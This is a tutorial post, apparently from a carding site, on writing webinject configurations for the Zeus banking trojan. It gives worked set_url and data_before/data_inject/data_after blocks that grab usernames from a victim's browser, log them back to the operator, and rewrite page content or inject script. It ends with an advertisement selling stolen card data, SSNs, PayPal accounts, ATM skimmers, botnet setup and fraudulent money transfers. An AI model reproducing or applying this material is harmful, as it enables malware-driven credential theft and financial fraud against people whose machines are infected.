You are currently viewing How to create Webinjects? for Zeus Botnet
Dangerous Hooded Hacker Breaks into Government Data Servers and Infects Their System with a Virus. His Hideout Place has Dark Atmosphere, Multiple Displays, Cables Everywhere.

How to create Webinjects? for Zeus Botnet

  • Post category:Tutorial
  • Post comments:0 Comments
  • Post last modified:August 19, 2022
  • Reading time:9 mins read

How to create Webinjects? for Zeus Botnet

How to create Webinjects

You just need knowledge about: javascript, css, HTML

1. Look to the page HTML source you want to inject, and think about where you will inject your HTML/javascript. USE THE SAME DESIGN as THEY USE ON THE PAGE, then it will be trusted.
2. Find the “real” URL of the page, sometimes it will use AJAX to get page context or frames
3. Sometimes the URL is unique. You can use wildcards the wildcards # and *. the # means just wildcard for 1 character and * means 0..* (nothing or more)
4. Think about when you want to inject the code, use G (GET) or P (on POST). You also can use both GP (on getting- and POST requests).

TIP on many sites uses forums that post data to the same page so use GP.

5. Sometimes you don’t want to inject, just want to grab information like personal info or saldo info then use L (for logging)


6. You can use; it for commenting in webinjects but don’t use this between data_before, data_end or between data_after, data_end. Just use this for new lines I will give example later.. this is just for dumb drugs addicts that forgot why you made the inject
7. The first shit is to set URL, you can use wildcards in it if the URL is changing, after that, you can add when the to inject must appear, if you add L (IT WON’T INJECT! you just receive a rapport with the data between data_before
and data_after)

I just give you an example here. I want to make an inject for this SHIT forum to grab a username. Can do that in very much diffrent ways

Way1:
<li><a href=”member.php?3782-FreeZS”>My Profile</a></li>

Way2:
<li class=”welcomelink”>Welcome, <a href=”member.php?3782-FreeZS”>FreeZS</a></li>

Way3:
<li><a class=”username” href=”member.php?3782-FreeZS”>FreeZS</a></li>

Now I must figure out on what page it is, but I am lazy so i do:
set_url http://www.true-carders.com/* GPL

This means on getting and POST Logging, this is very useless because my rapports get flooded on each page the name apaire it will grab and send raport

I gonna use Way2 here is the example:

I will grab <li class=”welcomelink”>Welcome, <a href=”member.php?3782-FreeZS”>FreeZS</a></li>

;Getting the username
set_url http://www.true-carders.com/* GPL

data_before
<li class=”welcomelink”>Welcome, <a href=”member.php?*”>
data_end

data_inject
Infraud Username:
data_end

data_after
</a></li>
data_end

But there’s also another good working example for Way2:

I will grab <li class=”welcomelink”>Welcome, <a href=”member.php?3782-FreeZS”>FreeZS</a></li>

;Getting the username
set_url http://www.true-carders.com/* GPL

data_before
<li class=”welcomelink”>Welcome, <a href=”member.php?*-
data_end

data_inject
Infraud Username:
data_end

data_after
“>
data_end

If I am sure about some things, like my userID is 3782, if I only want to grab usernames with 4 digits then I do

I will grab <li class=”welcomelink”>Welcome, <a href=”member.php?3782-FreeZS”>FreeZS</a></li>

;Getting the username
set_url http://www.true-carders.com/* GPL

data_before
<li class=”welcomelink”>Welcome, <a href=”member.php?####-
data_end

data_inject
Infraud Username:
data_end

data_after
“>
data_end

I will get rapports with Infraud Username: [HERE_GRABBED_STRING]

Ok now webinjecting.. You understand how to grab shit.. now we can make changes to the page on getting- and POST- requests

;Setting EVERY nickname on welcome to FreeZS
set_url http://www.true-carders.com/* GP

data_before
<li class=”welcomelink”>Welcome, <a href=”member.php?*”>
data_end

data_inject
FreeZS
data_end

data_after
</a></li>
data_end

;Change every title on true-carders.com/* to WebInject-Example
data_before
<title>
data_end

data_inject
WebInject-Example
data_end

data_after
</title>
data_end

;Inject alert() on this thread when browser send GET-request
set_url http://www.true-carders.com/showthread.php?34…ate-Webinjects G

data_before
<script type=”text/javascript”>
<!–
data_end

data_inject
alert(“Hi FreeZS WebInject examples”);
data_end

data_after
var SESSIONURL = “”;
data_end

Hope this is enough for many people

WE ARE HERE FOR SERIOUS BUSINESS WE DO NOT ENTERTAIN OR RESPOND TO TIME WASTERS. WE HOPE YOU ARE AS SERIOUS AS WE ARE

 

Contact us for support. We sell fresh tools like CVV & Cards, SSN, Paypal accounts, Dumps with Pin, ATM Skimmers, Email Leads, Smtp, and lots more.
We have other services like Bank transfers to any bank account, we can Cards anytime for you and ship for half the price, Carding iPhone 11 pro, Botnet setup service, and Carding Classes where you will learn everything that will help you make money.

 

Lists Of Transfers Available for Grabs

You can make a lot of money as your mind can conceive. You don’t necessarily need to 9 am – 5 pm job to have a life. Live Your dreams, buy that house, go on that vacation, buy that dream car, and invest in real estate with these transfers.

Paypal Transfer —————————————Click Here

Cashapp transfer ————————————-Click Here 

Western Union Transfer —————————Click Here

Bank transfer ——————————————Click Here

Venmo transfer —————————————Click Here

 

Leave a Reply